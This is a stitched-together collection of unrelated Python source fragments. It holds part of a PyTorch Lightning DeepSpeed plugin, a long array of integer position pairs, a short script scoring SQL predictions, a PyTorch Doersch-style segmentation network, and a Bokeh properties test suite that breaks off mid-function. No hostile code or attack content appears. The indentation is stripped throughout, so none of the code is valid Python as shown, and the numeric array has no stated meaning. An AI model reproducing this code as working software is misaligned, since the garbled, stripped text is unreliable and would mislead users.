lr_scheduler=scheduler,
dist_init_required=False,
)
self._set_deepspeed_activation_checkpointing()
# although we set these here, deepspeed manages the specific optimizer logic
self.lightning_module.trainer.optimizers = [deepspeed_optimizer]
deepspeed_scheduler = model.lr_scheduler
if deepspeed_scheduler is not None:
# disable deepspeed lr scheduling as lightning manages scheduling
model.lr_scheduler = None
lr_scheduler["scheduler"] = deepspeed_scheduler
self.lightning_module.trainer.lr_schedulers = [lr_scheduler]
self.model = model
@contextlib.contextmanager
def model_sharded_context(self) -> Generator[None, None, None]:
if self.zero_stage_3:
assert self._config_initialized
dtype = torch.float16 if self.precision in (16, "mixed") else torch.float32
model_parallel_context = deepspeed.zero.Init(
remote_device=self.remote_device, pin_memory=True, config=self.config, dtype=dtype
)
else:
model_parallel_context = super().model_sharded_context()
with model_parallel_context:
yield
@property
def precision(self) -> Union[str, int]:
return self.lightning_module.trainer.precision
def _set_deepspeed_activation_checkpointing(self):
if self.config.get("activation_checkpointing"):
checkpoint_config = self.config["activation_checkpointing"]
deepspeed.checkpointing.configure(
mpu_=None,
partition_activations=checkpoint_config.get("partition_activations"),
contiguous_checkpointing=checkpoint_config.get("contiguous_checkpointing"),
checkpoint_in_cpu=checkpoint_config.get("checkpoint_in_cpu"),
profile=checkpoint_config.get("profile"),
)
def _initialize_deepspeed_inference(self, model):
# todo: Currently DeepSpeed requires optimizers at inference to partition weights correctly
optimizer, scheduler = None, None
if "optimizer" not in self.config:
rank_zero_info(
"You have not specified an optimizer or scheduler within the DeepSpeed config."
"Using `configure_optimizers` to define optimizer and scheduler."
)
optimizer, lr_scheduler, _ = self._init_optimizers()
scheduler = lr_scheduler["scheduler"]
inference_config = {
# todo: this is required for DeepSpeed throughput timers, or throughput timers will be incorrect
"train_micro_batch_size_per_gpu": 1
}
if "fp16" in self.config:
inference_config.update({"fp16": self.config["fp16"]})
if self.zero_stage_3:
inference_config.update(
{
"zero_allow_untested_optimizer": self.config["zero_allow_untested_optimizer"],
"zero_optimization": self.config["zero_optimization"],
}
)
# Remove all module hooks before initializing new model
remove_module_hooks(model)
model, _, _, _ = deepspeed.initialize(
config=inference_config,
model=model,
optimizer=optimizer,
lr_scheduler=scheduler,
model_parameters=[],
dist_init_required=False,
)
self.model = model
@property
def lightning_module(self):
        # the model may not be wrapped with DeepSpeedEngine & LightningDeepSpeedModule if this is called too early
module = getattr(self.model, "module", self.model)
return module.module if isinstance(module, LightningDeepSpeedModule) else module
@property
def distributed_sampler_kwargs(self):
distributed_sampler_kwargs = dict(num_replicas=self.world_size, rank=self.global_rank)
return distributed_sampler_kwargs
def init_optimizers(self, trainer: "pl.Trainer", model: "pl.LightningModule") -> Tuple[List, List, List]:
# Skip initializing optimizers here as DeepSpeed handles optimizers via config.
# User may have specified config options instead in configure_optimizers, but this is handled
# via `_initialize_deepspeed_train`
return [], [], [] # empty optimizers, schedulers and frequencies
def optimizer_step(self, optimizer: torch.optim.Optimizer, lambda_closure: Callable, **kwargs):
# note: We rely on the deepspeed engine to carry out the step rather than the optimizer.
# internally, the engine has a reference to the optimizer already.
self.model.step(**kwargs)
@property
def handles_gradient_accumulation(self) -> bool:
"""Whether the plugin handles gradient accumulation internally."""
return True
def _format_config(self):
if self.config is None:
raise MisconfigurationException(
"To use DeepSpeed you must pass in a DeepSpeed config dict, or a path to a JSON config."
" See: https://pytorch-lightning.readthedocs.io/en/latest/advanced/multi_gpu.html#deepspeed"
)
self._format_batch_size_and_grad_accum_config()
self._format_precision_config()
def _format_batch_size_and_grad_accum_config(self):
if "gradient_accumulation_steps" in self.config:
raise MisconfigurationException(
"Do not set `gradient_accumulation_steps` in the DeepSpeed config"
" as this will be set with the `accumulate_grad_batches` argument passed via the Lightning Trainer."
)
self.config["gradient_accumulation_steps"] = self.lightning_module.trainer.accumulate_grad_batches
if "train_micro_batch_size_per_gpu" not in self.config:
rank_zero_warn(
"Inferring the batch size for internal deepspeed logging from the `train_dataloader()`. "
"If you require skipping this, please pass "
"`Trainer(plugins=DeepSpeedPlugin(logging_batch_size_per_gpu=batch_size))`"
)
batch_size = self._auto_select_batch_size()
self.config["train_micro_batch_size_per_gpu"] = batch_size
if "gradient_clipping" not in self.config:
self.config["gradient_clipping"] = self.lightning_module.trainer.gradient_clip_val
def _auto_select_batch_size(self):
# train_micro_batch_size_per_gpu is used for throughput logging purposes
# by default we try to use the batch size of the loader
batch_size = 1
if hasattr(self.lightning_module, "train_dataloader"):
train_dataloader = self.lightning_module.train_dataloader()
if hasattr(train_dataloader, "batch_sampler"):
batch_size = train_dataloader.batch_sampler.batch_size
return batch_size
def _format_precision_config(self):
amp_type = self.lightning_module.trainer.accelerator_connector.amp_type
amp_level = self.lightning_module.trainer.accelerator_connector.amp_level
precision = self.lightning_module.trainer.accelerator_connector.precision
if precision in (16, "mixed"):
if "fp16" not in self.config and amp_type == AMPType.NATIVE:
# FP16 is a DeepSpeed standalone AMP implementation
rank_zero_info("Enabling DeepSpeed FP16.")
self.config["fp16"] = {
"enabled": True,
"loss_scale": self.loss_scale,
"initial_scale_power": self.initial_scale_power,
"loss_scale_window": self.loss_scale_window,
"hysteresis": self.hysteresis,
"min_loss_scale": self.min_loss_scale,
}
elif "amp" not in self.config and amp_type == AMPType.APEX:
                rank_zero_info("Enabling DeepSpeed APEX Implementation.")
self.config["amp"] = {"enabled": True, "opt_level": amp_level}
def _create_default_config(
self,
zero_optimization: bool,
zero_allow_untested_optimizer: bool,
logging_batch_size_per_gpu: Union[str, int],
partition_activations: bool,
cpu_checkpointing: bool,
contiguous_memory_optimization: bool,
synchronize_checkpoint_boundary: bool,
offload_optimizer: bool,
offload_parameters: bool,
nvme_path: str,
offload_params_device: str,
params_buffer_count: int,
params_buffer_size: int,
max_in_cpu: int,
offload_optimizer_device: str,
optimizer_buffer_count: int,
pin_memory: bool,
block_size: int,
queue_depth: int,
single_submit: bool,
overlap_events: bool,
thread_count: int,
**zero_kwargs,
) -> Dict:
cfg = {
"activation_checkpointing": {
"partition_activations": partition_activations,
"cpu_checkpointing": cpu_checkpointing,
"contiguous_memory_optimization": contiguous_memory_optimization,
"synchronize_checkpoint_boundary": synchronize_checkpoint_boundary,
},
"aio": {
"block_size": block_size,
"queue_depth": queue_depth,
"single_submit": single_submit,
"overlap_events": overlap_events,
"thread_count": thread_count,
},
}
if zero_optimization:
zero_config = zero_kwargs
if offload_optimizer:
zero_config["offload_optimizer"] = {
"device": offload_optimizer_device,
"nvme_path": nvme_path,
"buffer_count": optimizer_buffer_count,
"pin_memory": pin_memory,
}
if offload_parameters:
zero_config["offload_param"] = {
"device": offload_params_device,
"nvme_path": nvme_path,
"buffer_count": params_buffer_count,
"buffer_size": params_buffer_size,
"max_in_cpu": max_in_cpu,
"pin_memory": pin_memory,
}
cfg = {
"zero_allow_untested_optimizer": zero_allow_untested_optimizer,
"zero_optimization": zero_config,
**cfg,
}
if logging_batch_size_per_gpu != "auto":
cfg = {"train_micro_batch_size_per_gpu": logging_batch_size_per_gpu, **cfg}
return cfg
@property
def deepspeed_engine(self):
return self.model
@property
def _multi_device(self) -> bool:
return self.num_processes > 1 or self.num_nodes > 1
def save_checkpoint(self, checkpoint: Dict, filepath: _PATH) -> None:
"""Save model/training states as a checkpoint file through state-dump and file-write.
Args:
checkpoint: The checkpoint state dictionary
filepath: write-target file's path
"""
if self.zero_stage_3 and self._multi_device and self.is_global_zero:
warning_cache.warn(
"When saving the DeepSpeed Stage 3 checkpoint, "
"each worker will save a shard of the checkpoint within a directory. "
"If a single file is required after training, "
"see https://pytorch-lightning.readthedocs.io/en/latest/advanced/advanced_gpu.html#"
"deepspeed-zero-stage-3-single-file for instructions."
)
# Use deepspeed's internal checkpointing function to handle partitioned weights across processes
# dump states as a checkpoint dictionary object
_exclude_keys = ["state_dict", "optimizer_states", "lr_schedulers"]
checkpoint = {k: v for k, v in checkpoint.items() if k not in _exclude_keys}
self.deepspeed_engine.save_checkpoint(filepath, client_state=checkpoint)
def load_checkpoint(self, checkpoint_path: _PATH) -> Dict[str, Any]:
if self.load_full_weights and self.zero_stage_3:
# Broadcast to ensure we load from the rank 0 checkpoint
# This doesn't have to be the case when using deepspeed sharded checkpointing
checkpoint_path = self.broadcast(checkpoint_path)
return super().load_checkpoint(checkpoint_path)
# Rely on deepspeed to load the checkpoint and necessary information
from pytorch_lightning.trainer.states import TrainerFn
is_fitting = self.lightning_module.trainer.state.fn == TrainerFn.FITTING
_, client_state = self.deepspeed_engine.load_checkpoint(
checkpoint_path, load_optimizer_states=is_fitting, load_lr_scheduler_states=is_fitting
)
if client_state is None:
raise MisconfigurationException(
"DeepSpeed was unable to load the checkpoint. Ensure you passed in a DeepSpeed compatible checkpoint "
"or a single checkpoint file with `Trainer(plugins=DeepSpeedPlugin(load_full_weights=True))`."
)
return client_state
@property
def lightning_restore_optimizer_and_schedulers(self) -> bool:
# managed by DeepSpeed
if self.load_full_weights and self.zero_stage_3 and self.lightning_module.trainer.state.fn == TrainerFn.FITTING:
rank_zero_warn(
"A single checkpoint file has been given. This means optimizer states and "
"scheduler states can not be restored. If you'd like to restore these states, you must "
"provide a path to the originally saved DeepSpeed checkpoint."
)
return False
def load_model_state_dict(self, checkpoint: Mapping[str, Any]) -> None:
# override to do nothing, deepspeed engine already loaded the weights in `load_checkpoint()`
if self.load_full_weights and self.zero_stage_3:
self.model_to_device()
self._restore_zero_state(checkpoint)
def _restore_zero_state(self, ckpt: Mapping[str, Any]) -> None:
"""Overrides the normal load_state_dict behaviour in PyTorch to ensure we gather parameters that may be
sharded across processes before loading the state dictionary when using ZeRO stage 3. This is then
automatically synced across processes.
Args:
ckpt: The ckpt file.
"""
def load(module: torch.nn.Module, prefix=""):
missing_keys = []
unexpected_keys = []
error_msgs = []
state_dict = ckpt["state_dict"]
# copy state_dict so _load_from_state_dict can modify it
metadata = getattr(state_dict, "_metadata", None)
state_dict = state_dict.copy()
if metadata is not None:
state_dict._metadata = metadata
local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
# because zero3 puts placeholders in model params, this context
# manager gathers (unpartitions) the params of the current layer, then loads from
# the state dict and then re-partitions them again
with deepspeed.zero.GatheredParameters(list(module.parameters(recurse=False)), modifier_rank=0):
if self.is_global_zero:
module._load_from_state_dict(
state_dict=state_dict,
prefix=prefix,
local_metadata=local_metadata,
strict=True,
missing_keys=missing_keys,
unexpected_keys=unexpected_keys,
error_msgs=error_msgs,
)
for name, child in module._modules.items():
if child is not None:
load(child, prefix + name + ".")
load(self.lightning_module, prefix="")
def load_optimizer_state_dict(self, checkpoint: Mapping[str, Any]) -> None:
# override to do nothing, deepspeed engine already loaded the states in `load_checkpoint()`
pass
@classmethod
def register_plugins(cls, plugin_registry: Dict) -> None:
plugin_registry.register("deepspeed", cls, description="Default DeepSpeed Plugin")
plugin_registry.register("deepspeed_stage_1", cls, description="DeepSpeed with ZeRO Stage 1 enabled", stage=1)
plugin_registry.register("deepspeed_stage_2", cls, description="DeepSpeed with ZeRO Stage 2 enabled", stage=2)
plugin_registry.register(
"deepspeed_stage_2_offload",
cls,
description="DeepSpeed ZeRO Stage 2 and CPU Offload",
stage=2,
offload_optimizer=True,
)
plugin_registry.register("deepspeed_stage_3", cls, description="DeepSpeed ZeRO Stage 3", stage=3)
plugin_registry.register(
"deepspeed_stage_3_offload",
cls,
description="DeepSpeed ZeRO Stage 3 and CPU Offload",
stage=3,
offload_optimizer=True,
offload_parameters=True,
)
plugin_registry.register(
"deepspeed_stage_3_offload_nvme",
cls,
description="DeepSpeed ZeRO Stage 3 and NVMe Offload",
stage=3,
offload_optimizer=True,
offload_parameters=True,
remote_device="nvme",
offload_params_device="nvme",
offload_optimizer_device="nvme",
)
@property
def checkpoint_io(self) -> CheckpointIO:
return self._checkpoint_io
@checkpoint_io.setter
def checkpoint_io(self, plugin: CheckpointIO) -> None:
raise MisconfigurationException("DeepSpeed currently does not support custom checkpoint plugins.")
def validation_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
def test_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
def predict_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
| [
[
[
593,
603
],
[
20925,
20935
]
],
[
[
611,
615
],
[
16027,
16031
]
],
[
[
623,
630
],
[
4387,
4394
]
],
[
[
638,
640
],
[
15529,
15531
],
[
15673,
15675
],
[
15771,
15773
],
[
17021,
17023
],
[
17099,
17101
],
[
17179,
17181
],
[
17230,
17232
],
[
17286,
17288
]
],
[
[
648,
656
],
[
16432,
16440
]
],
[
[
681,
692
],
[
2162,
2173
],
[
2253,
2264
],
[
2303,
2314
],
[
2352,
2363
],
[
2410,
2421
]
],
[
[
713,
717
],
[
4332,
4336
],
[
15744,
15748
]
],
[
[
737,
740
],
[
2948,
2951
],
[
32377,
32380
],
[
34102,
34105
],
[
34413,
34416
],
[
36342,
36345
]
],
[
[
742,
750
],
[
24735,
24743
]
],
[
[
752,
756
],
[
29144,
29148
],
[
31139,
31143
],
[
32367,
32371
],
[
36535,
36539
]
],
[
[
758,
767
],
[
20990,
20999
]
],
[
[
769,
773
],
[
4477,
4481
],
[
24328,
24332
],
[
24334,
24338
],
[
24340,
24344
]
],
[
[
775,
782
],
[
34089,
34096
],
[
34400,
34407
],
[
36329,
36336
]
],
[
[
784,
792
],
[
4317,
4325
],
[
4420,
4428
],
[
4468,
4476
],
[
4534,
4542
],
[
18651,
18659
],
[
18690,
18698
]
],
[
[
794,
799
],
[
18634,
18639
],
[
24322,
24327
]
],
[
[
801,
806
],
[
4275,
4280
],
[
4326,
4331
],
[
18660,
18665
],
[
21533,
21538
],
[
28474,
28479
]
],
[
[
815,
820
],
[
1995,
2000
],
[
2998,
3003
],
[
3017,
3022
],
[
4482,
4487
],
[
18163,
18168
],
[
18217,
18222
],
[
21113,
21118
],
[
21167,
21172
],
[
24696,
24701
],
[
34780,
34785
]
],
[
[
845,
854
],
[
18640,
18649
]
],
[
[
863,
886
]
],
[
[
932,
959
],
[
2457,
2484
]
],
[
[
1031,
1049
],
[
4543,
4561
]
],
[
[
1109,
1121
],
[
37907,
37919
],
[
38019,
38031
]
],
[
[
1178,
1187
],
[
3111,
3120
]
],
[
[
1237,
1266
],
[
19153,
19182
],
[
19565,
19594
]
],
[
[
1312,
1321
],
[
33682,
33691
]
],
[
[
1362,
1369
],
[
27555,
27562
],
[
28146,
28153
]
],
[
[
1421,
1440
],
[
2970,
2989
]
],
[
[
1493,
1496
],
[
16611,
16614
]
],
[
[
1498,
1512
],
[
15553,
15567
],
[
19623,
19637
],
[
22443,
22457
],
[
27655,
27669
]
],
[
[
1514,
1528
],
[
28176,
28190
]
],
[
[
1580,
1605
],
[
12862,
12887
],
[
15817,
15842
],
[
17697,
17722
],
[
18926,
18951
],
[
25206,
25231
],
[
25689,
25714
],
[
33169,
33194
],
[
38056,
38081
]
],
[
[
1654,
1674
],
[
1919,
1939
],
[
12822,
12842
]
],
[
[
1720,
1730
],
[
16104,
16114
]
],
[
[
1777,
1782
],
[
31155,
31160
],
[
32357,
32362
]
],
[
[
1784,
1804
],
[
18666,
18686
]
],
[
[
1854,
1868
],
[
26113,
26127
],
[
33713,
33727
]
],
[
[
1870,
1882
],
[
1900,
1912
]
],
[
[
1884,
1897
],
[
31484,
31497
]
],
[
[
1952,
1961
],
[
14976,
14985
],
[
16819,
16828
],
[
18243,
18252
],
[
20091,
20100
],
[
21218,
21227
],
[
21801,
21810
],
[
23478,
23487
],
[
35543,
35552
]
],
[
[
1968,
1987
],
[
23426,
23445
]
],
[
[
2432,
2456
],
[
17939,
17963
],
[
24004,
24028
]
],
[
[
3095,
3110
]
]
] |
# coding=utf8
import os
import re
import json
import argparse
from sql.evaluator import compare_sqls
def evaluate(path, timeout=120):
with open(path, 'r') as f:
predictions = json.load(f)
total = len(predictions)
correct = 0
for pidx, p in enumerate(predictions):
truth = p['truth_logical_form']
pred = p['predicted_logical_form']
if compare_sqls(truth, pred):
correct += 1
print("Total: %d, Correct: %d, Accuracy: %f" %
(total, correct, float(correct / total)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--predictions', help='file that stores the prediction results', required=True)
args = parser.parse_args()
evaluate(args.predictions)
| [
[
[
22,
24
]
],
[
[
32,
34
]
],
[
[
42,
46
],
[
190,
194
]
],
[
[
54,
62
],
[
589,
597
]
],
[
[
89,
101
],
[
390,
402
]
],
[
[
108,
116
],
[
763,
771
]
],
[
[
580,
586
],
[
619,
625
],
[
739,
745
]
],
[
[
732,
736
],
[
772,
776
]
]
] |
import torch
import torch.nn as nn
import torch.nn.functional as F
from proj.archs.cluster.vgg import VGGNet
from proj.archs.segmentation.net10a import SegmentationNet10aTrunk, \
SegmentationNet10a
from proj.utils.segmentation.baselines.general import get_patches
__all__ = ["SegmentationNet10aDoersch"]
class DoerschHead(nn.Module):
def __init__(self, config):
super(DoerschHead, self).__init__()
self.patch_side = config.doersch_patch_side
self.siamese_branch = nn.Sequential(
nn.Conv2d(in_channels=SegmentationNet10a.cfg[-1][0], out_channels=1024,
kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(inplace=True)
)
self.joint = nn.Sequential(
nn.Linear(2 * 1024 * self.patch_side * self.patch_side, 1024),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(1024, 9) # 9 gt positions, N, NE... NW.
)
def forward(self, patches1, patches2):
patches1 = self.siamese_branch(patches1)
patches2 = self.siamese_branch(patches2)
ni, k, h, w = patches1.size()
ni2, k2, h2, w2 = patches1.size()
if not ((ni == ni2) and (k == k2) and (h == h2) and (w == w2) and \
(h == self.patch_side) and (w == self.patch_side)):
print(ni, k, h, w)
print(ni2, k2, h2, w2)
assert (False)
# flatten all but first dim
patches1 = patches1.contiguous() # otherwise view may behave funny
patches2 = patches2.contiguous()
patches1 = patches1.view(patches1.size(0), -1)
patches2 = patches2.view(patches2.size(0), -1)
concatenated = torch.cat((patches1, patches2), dim=1)
ni3, nf = concatenated.size()
if not ((ni3 == ni) and (nf == (2 * 1024 * self.patch_side *
self.patch_side))):
print(ni, k, h, w)
print(ni2, k2, h2, w2)
print(patches1.size())
print(patches2.size())
print(ni3, nf)
assert (False)
return self.joint(concatenated)
class SegmentationNet10aDoersch(VGGNet):
def __init__(self, config):
super(SegmentationNet10aDoersch, self).__init__()
self.patch_side = config.doersch_patch_side
self.input_sz = config.input_sz
self.features_sz = SegmentationNet10a.cfg[-1][0]
print("SegmentationNet10aDoersch: %d %d %d" % (self.patch_side,
self.input_sz,
self.features_sz))
self.features = SegmentationNet10aTrunk(config, cfg=SegmentationNet10a.cfg)
self.doersch_head = DoerschHead(config)
self._initialize_weights()
def forward(self, x, centre=None, other=None, penultimate=False):
x = self.features(x)
x = F.interpolate(x, size=self.input_sz, mode="bilinear")
if not penultimate:
assert ((centre is not None) and (other is not None))
patches1, patches2 = \
get_patches(x, centre, other, self.patch_side)
# predicted position distribution, no softmax - using
# torch.CrossEntropyLoss
# shape: bn, 9
x = self.doersch_head(patches1, patches2)
return x
| [
[
[
7,
12
],
[
1736,
1741
]
],
[
[
20,
34
],
[
330,
332
],
[
501,
503
],
[
528,
530
],
[
683,
685
],
[
717,
719
],
[
771,
773
],
[
798,
800
],
[
873,
875
],
[
900,
902
],
[
926,
928
]
],
[
[
42,
66
],
[
2955,
2956
]
],
[
[
103,
109
],
[
2208,
2214
]
],
[
[
153,
176
],
[
2699,
2722
]
],
[
[
184,
202
],
[
550,
568
],
[
2427,
2445
],
[
2735,
2753
]
],
[
[
257,
268
],
[
3155,
3166
]
],
[
[
270,
277
]
],
[
[
318,
329
],
[
388,
399
],
[
2787,
2798
]
],
[
[
2182,
2207
],
[
2263,
2288
]
]
] |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# External imports
import numpy as np
# Bokeh imports
from bokeh._testing.util.api import verify_all
from bokeh.core.has_props import HasProps
from bokeh.core.properties import (
Alias,
Dict,
Enum,
Float,
Instance,
Int,
List,
Nullable,
NumberSpec,
Override,
String,
)
from bokeh.models import Plot
# Module under test
import bokeh.core.properties as bcp # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
ALL = (
'Alias',
'Alpha',
'AlphaSpec',
'Angle',
'AngleSpec',
'Any',
'AnyRef',
'Array',
'Auto',
'Base64String',
'Bool',
'Byte',
'Color',
'ColorHex',
'ColorSpec',
'ColumnData',
'Complex',
'DashPattern',
'DataSpec',
'Date',
'Datetime',
'Dict',
'DistanceSpec',
'Either',
'Enum',
'Factor',
'FactorSeq',
'Float',
'FontSize',
'FontSizeSpec',
'HatchPatternSpec',
'HatchPatternType',
'Image',
'Include',
'Instance',
'Int',
'Interval',
'JSON',
'List',
'MarkerSpec',
'MarkerType',
'MathString',
'MinMaxBounds',
'NonNegativeInt',
'NonNullable',
'Null',
'NullStringSpec',
'Nullable',
'NumberSpec',
'Override',
'PandasDataFrame',
'PandasGroupBy',
'Percent',
'PositiveInt',
'RGB',
'Readonly',
'Regex',
'RelativeDelta',
'RestrictedDict',
'Seq',
'Size',
'SizeSpec',
'String',
'StringSpec',
'Struct',
'TimeDelta',
'TextLike',
'Tuple',
'UnitsSpec',
'expr',
'field',
'validate',
'value',
'without_property_validation'
)
#-----------------------------------------------------------------------------
# General API
#----------------------------------------------------------------------------
# TODO (bev) These tests should be moved to better places
class TestBasic:
def test_simple_class(self) -> None:
class Foo(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1, 2, 3])
zz = Dict(String, Int)
s = Nullable(String(None))
f = Foo()
assert f.x == 12
assert f.y == "hello"
assert np.array_equal(np.array([1, 2, 3]), f.z)
assert f.s is None
assert {"x", "y", "z", "zz", "s"} == f.properties()
with_defaults = f.properties_with_values(include_defaults=True)
assert dict(x=12, y="hello", z=[1,2,3], zz={}, s=None) == with_defaults
without_defaults = f.properties_with_values(include_defaults=False)
assert dict() == without_defaults
f.x = 18
assert f.x == 18
f.y = "bar"
assert f.y == "bar"
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar") == without_defaults
f.z[0] = 100
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar", z=[100,2,3]) == without_defaults
f.zz = {'a': 10}
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar", z=[100,2,3], zz={'a': 10}) == without_defaults
def test_enum(self) -> None:
class Foo(HasProps):
x = Enum("blue", "red", "green") # the first item is the default
y = Enum("small", "medium", "large", default="large")
f = Foo()
assert f.x == "blue"
assert f.y == "large"
f.x = "red"
assert f.x == "red"
with pytest.raises(ValueError):
f.x = "yellow"
f.y = "small"
assert f.y == "small"
with pytest.raises(ValueError):
f.y = "yellow"
def test_inheritance(self) -> None:
class Base(HasProps):
x = Int(12)
y = String("hello")
class Child(Base):
z = Float(3.14)
c = Child()
assert frozenset(['x', 'y', 'z']) == frozenset(c.properties())
assert c.y == "hello"
def test_set(self) -> None:
class Foo(HasProps):
x = Int(12)
y = Enum("red", "blue", "green")
z = String("blah")
f = Foo()
assert f.x == 12
assert f.y == "red"
assert f.z == "blah"
f.update(**dict(x=20, y="green", z="hello"))
assert f.x == 20
assert f.y == "green"
assert f.z == "hello"
with pytest.raises(ValueError):
f.update(y="orange")
def test_accurate_properties_sets(self) -> None:
class Base(HasProps):
num = Int(12)
container = List(String)
child = Instance(HasProps)
class Mixin(HasProps):
mixin_num = Int(12)
mixin_container = List(String)
mixin_child = Instance(HasProps)
class Sub(Base, Mixin):
sub_num = Int(12)
sub_container = List(String)
sub_child = Instance(HasProps)
b = Base()
assert {"child"} == set(b.properties_with_refs())
assert {"num", "container", "child"} == b.properties()
m = Mixin()
assert set(m.properties_with_refs()) == {"mixin_child"}
assert m.properties() == {"mixin_num", "mixin_container", "mixin_child"}
s = Sub()
assert set(s.properties_with_refs()) == {"child", "sub_child", "mixin_child"}
assert s.properties() == {"num", "container", "child", "mixin_num", "mixin_container", "mixin_child", "sub_num", "sub_container", "sub_child"}
# verify caching
assert s.properties_with_refs() is s.properties_with_refs()
assert s.properties() is s.properties()
def test_accurate_dataspecs(self) -> None:
class Base(HasProps):
num = NumberSpec(12)
not_a_dataspec = Float(10)
class Mixin(HasProps):
mixin_num = NumberSpec(14)
class Sub(Base, Mixin):
sub_num = NumberSpec(16)
base = Base()
mixin = Mixin()
sub = Sub()
assert {"num"} == set(base.dataspecs())
assert {"mixin_num"} == set(mixin.dataspecs())
assert {"num", "mixin_num", "sub_num"} == set(sub.dataspecs())
def test_not_serialized(self) -> None:
class NotSerialized(HasProps):
x = Int(12, serialized=False)
y = String("hello")
o = NotSerialized()
assert o.x == 12
assert o.y == 'hello'
# non-serialized props are still in the list of props
assert 'x' in o.properties()
assert 'y' in o.properties()
# but they aren't in the dict of props with values, since their
# values are not important (already included in other values,
# as with the _units properties)
assert 'x' not in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
o.x = 42
o.y = 'world'
assert 'x' not in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_readonly(self) -> None:
class Readonly(HasProps):
x = Int(12, readonly=True) # with default
y = Nullable(Int(), readonly=True) # without default
z = String("hello")
o = Readonly()
assert o.x == 12
assert o.y == None
assert o.z == 'hello'
# readonly props are still in the list of props
assert 'x' in o.properties()
assert 'y' in o.properties()
assert 'z' in o.properties()
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'z' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
assert 'z' not in o.properties_with_values(include_defaults=False)
with pytest.raises(RuntimeError):
o.x = 7
with pytest.raises(RuntimeError):
o.y = 7
o.z = "xyz"
assert o.x == 12
assert o.y == None
assert o.z == 'xyz'
def test_include_defaults(self) -> None:
class IncludeDefaultsTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsTest()
assert o.x == 12
assert o.y == 'hello'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
o.x = 42
o.y = 'world'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_include_defaults_with_kwargs(self) -> None:
class IncludeDefaultsKwargsTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsKwargsTest(x=14, y="world")
assert o.x == 14
assert o.y == 'world'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_include_defaults_set_to_same(self) -> None:
class IncludeDefaultsSetToSameTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsSetToSameTest()
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
# this should no-op
o.x = 12
o.y = "hello"
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
def test_override_defaults(self) -> None:
class FooBase(HasProps):
x = Int(12)
class FooSub(FooBase):
x = Override(default=14)
def func_default():
return 16
class FooSubSub(FooBase):
x = Override(default=func_default)
f_base = FooBase()
f_sub = FooSub()
f_sub_sub = FooSubSub()
assert f_base.x == 12
assert f_sub.x == 14
assert f_sub_sub.x == 16
assert 12 == f_base.properties_with_values(include_defaults=True)['x']
assert 14 == f_sub.properties_with_values(include_defaults=True)['x']
assert 16 == f_sub_sub.properties_with_values(include_defaults=True)['x']
assert 'x' not in f_base.properties_with_values(include_defaults=False)
assert 'x' not in f_sub.properties_with_values(include_defaults=False)
assert 'x' in f_sub_sub.properties_with_values(include_defaults=False)
# def test_kwargs_init(self) -> None:
# class Foo(HasProps):
# x = String
# y = Int
# z = Float
# f = Foo(x = "hello", y = 14)
# assert f.x == "hello"
# assert f.y == 14
# with pytest.raises(TypeError):
# # This should raise a TypeError: object.__init__() takes no parameters
# g = Foo(z = 3.14, q = "blah")
class Foo(HasProps):
pass
class Bar(HasProps):
pass
class Baz(HasProps):
pass
def test_HasProps_equals() -> None:
class Foo(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1,2,3])
class FooUnrelated(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1,2,3])
v = Foo().equals(Foo())
assert v is True
v = Foo(x=1).equals(Foo(x=1))
assert v is True
v = Foo(x=1).equals(Foo(x=2))
assert v is False
v = Foo(x=1).equals(1)
assert v is False
v = Foo().equals(FooUnrelated())
assert v is False
def test_HasProps_clone() -> None:
p1 = Plot(width=1000)
c1 = p1.properties_with_values(include_defaults=False)
p2 = p1._clone()
